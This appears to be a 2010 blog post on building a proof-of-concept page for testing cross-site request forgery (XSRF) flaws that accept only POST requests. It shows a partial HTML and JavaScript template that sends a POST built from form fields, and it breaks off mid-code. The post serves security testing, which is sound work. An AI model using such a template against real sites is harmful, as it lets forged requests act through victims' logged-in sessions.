Posts Tagged ‘xsrf’

XSRF POST Testing

Wednesday, February 3rd, 2010 by mopey

Writing a POC for an XSRF that only allows POST is not as straightforward as for a GET. I use something like the following for situations like that.

<html>
<head></head>
<body>
<script>
function poststuff() {
    var site = document.getElementById("posturl").value;
    var post_data = document.getElementById("postparam").value;
    alert("site: " + site);
    alert("pdata: " + post_data);
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", site, true);
    xmlhttp.onreadystatechange [...]

